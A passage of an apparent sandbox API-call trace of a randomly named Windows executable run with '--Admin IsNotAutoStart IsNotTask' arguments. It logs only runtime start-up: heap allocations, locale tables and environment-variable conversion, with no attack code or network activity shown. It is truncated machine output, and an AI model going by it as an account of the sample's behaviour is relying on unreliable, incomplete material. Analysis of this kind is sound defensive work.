dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x425128, hStdOutput=0x86588f24, hStdError=0x58)) [0110.258] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0110.258] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0110.258] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0110.258] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OqRoSnESYXcDITEx.exe\" --Admin IsNotAutoStart IsNotTask" [0110.258] GetEnvironmentStringsW () returned 0x498fe98* [0110.258] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xaca) returned 0x4990970 [0110.258] FreeEnvironmentStringsW (penv=0x498fe98) returned 1 [0110.258] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x511130, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OqRoSnESYXcDITEx.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\oqrosnesyxcditex.exe")) returned 0x3a [0110.258] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xcc) returned 0x498fe98 [0110.258] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0x98) returned 0x498ff70 [0110.258] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0x3e) returned 0x4984c40 [0110.258] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0x6c) returned 0x4990010 [0110.258] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0x6e) returned 0x4990088 [0110.258] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0x78) returned 0x4981920 [0110.258] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0x62) returned 0x4990100 [0110.258] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0x2e) returned 0x498b030 [0110.258] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0x48) returned 0x49873b0 [0110.258] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0x28) returned 0x498a9b8 [0110.258] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0x1a) returned 0x498efc8 [0110.258] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0x4a) returned 0x4990170 [0110.259] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0x72) returned 0x49819a0 [0110.259] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0x30) returned 0x498b068 [0110.259] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0x2e) returned 0x498b0a0 [0110.259] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0x1c) returned 0x498eff0 [0110.259] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0xd2) returned 0x49901c8 [0110.259] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0x7c) returned 0x49902a8 [0110.259] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0x36) returned 0x4990330 [0110.259] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0x3a) returned 0x4984c88 [0110.259] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0x90) returned 0x4990370 [0110.259] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0x24) returned 0x498a9e8 [0110.259] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0x30) returned 0x498b0d8 [0110.259] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0x36) returned 0x4990408 [0110.259] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0x48) returned 0x4987400 [0110.259] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0x52) returned 0x4990448 [0110.259] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0x3c) returned 0x4984cd0 [0110.259] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0x82) returned 0x49904a8 [0110.259] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0x2e) returned 0x498b110 [0110.259] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0x1e) returned 0x498f018 [0110.259] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0x2c) returned 0x498b148 [0110.259] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0x54) returned 0x4990538 [0110.259] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0x52) returned 0x4990598 [0110.259] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0x2a) returned 0x498b180 [0110.259] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0x3c) returned 0x4984d18 [0110.259] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0x54) returned 0x49905f8 [0110.259] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0x24) returned 0x498aa18 [0110.259] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0x30) returned 0x498b1b8 [0110.259] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0x8c) returned 0x4990658 [0110.259] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4990970 | out: hHeap=0x4970000) returned 1 [0110.260] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0x800) returned 0x49906f0 [0110.260] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0x80) returned 0x4990ef8 [0110.260] GetLastError () returned 0x0 [0110.260] IsValidCodePage (CodePage=0x4e4) returned 1 [0110.260] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18ecf4 | out: lpCPInfo=0x18ecf4) returned 1 [0110.260] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18e7bc | out: lpCPInfo=0x18e7bc) returned 1 [0110.260] GetLastError () returned 0x0 [0110.260] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0110.260] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpDestStr=0x18e2f8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0110.260] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18ead0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x94\x8eX\x86\x0cí\x18", lpUsedDefaultChar=0x0) returned 256 [0110.260] GetLastError () returned 0x0 [0110.260] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿꥊBĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0110.260] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿꥊBĀ", cchSrc=256, lpDestStr=0x18e318, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0110.260] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18e9d0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x94\x8eX\x86\x0cí\x18", lpUsedDefaultChar=0x0) returned 256 [0110.260] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0110.260] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x431d5b) returned 0x4096ac [0110.263] RtlSizeHeap (HeapHandle=0x4970000, Flags=0x0, MemoryPointer=0x4990ef8) returned 0x80 [0110.263] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0110.263] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0x1f) returned 0x498f040 [0110.263] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x498f040, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 31 [0110.263] GetLastError () returned 0x0 [0110.263] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0x49911a8, Size=0x8) returned 0x49911a8 [0110.263] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0110.263] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0x36) returned 0x49911b8 [0110.263] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0x49911b8, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpUsedDefaultChar=0x0) returned 54 [0110.263] GetLastError () returned 0x0 [0110.263] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0x49911a8, Size=0xc) returned 0x49911f8 [0110.263] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0110.263] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0x37) returned 0x4991210 [0110.263] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x4991210, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 55 [0110.263] GetLastError () returned 0x0 [0110.263] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0x49911f8, Size=0x10) returned 0x49911f8 [0110.263] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0110.263] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0x3c) returned 0x4984d60 [0110.263] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x4984d60, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 60 [0110.263] GetLastError () returned 0x0 [0110.264] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0x49911f8, Size=0x14) returned 0x4991250 [0110.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0110.264] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0x31) returned 0x4991270 [0110.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x4991270, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramW6432=C:\\Program Files\\Common Files", lpUsedDefaultChar=0x0) returned 49 [0110.264] GetLastError () returned 0x0 [0110.264] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0x4991250, Size=0x18) returned 0x4991250 [0110.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0110.264] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0x17) returned 0x49912c8 [0110.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x49912c8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COMPUTERNAME=XDUWTFONO", lpUsedDefaultChar=0x0) returned 23 [0110.264] GetLastError () returned 0x0 [0110.264] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0x4991250, Size=0x1c) returned 0x4991ab0 [0110.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0110.264] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0x24) returned 0x498aa48 [0110.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0x498aa48, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ComSpec=C:\\Windows\\system32\\cmd.exe", lpUsedDefaultChar=0x0) returned 36 [0110.264] GetLastError () returned 0x0 [0110.264] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0x4991ab0, Size=0x20) returned 0x4991ab0 [0110.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0110.264] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0x14) returned 0x49912e8 [0110.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0x49912e8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FP_NO_HOST_CHECK=NO", lpUsedDefaultChar=0x0) returned 20 [0110.264] GetLastError () returned 0x0 [0110.264] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0x4991ab0, Size=0x24) returned 0x4991ab0 [0110.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0110.264] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0xd) returned 0x498e068 [0110.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0x498e068, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEDRIVE=C:", lpUsedDefaultChar=0x0) returned 13 [0110.264] GetLastError () returned 0x0 [0110.264] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0x4991ab0, Size=0x28) returned 0x4991ab0 [0110.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0110.264] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0x25) returned 0x498aa78 [0110.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x498aa78, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 37 [0110.264] GetLastError () returned 0x0 [0110.265] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0x4991ab0, Size=0x2c) returned 0x4991ab0 [0110.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 57 [0110.265] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0x39) returned 0x4984da8 [0110.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", 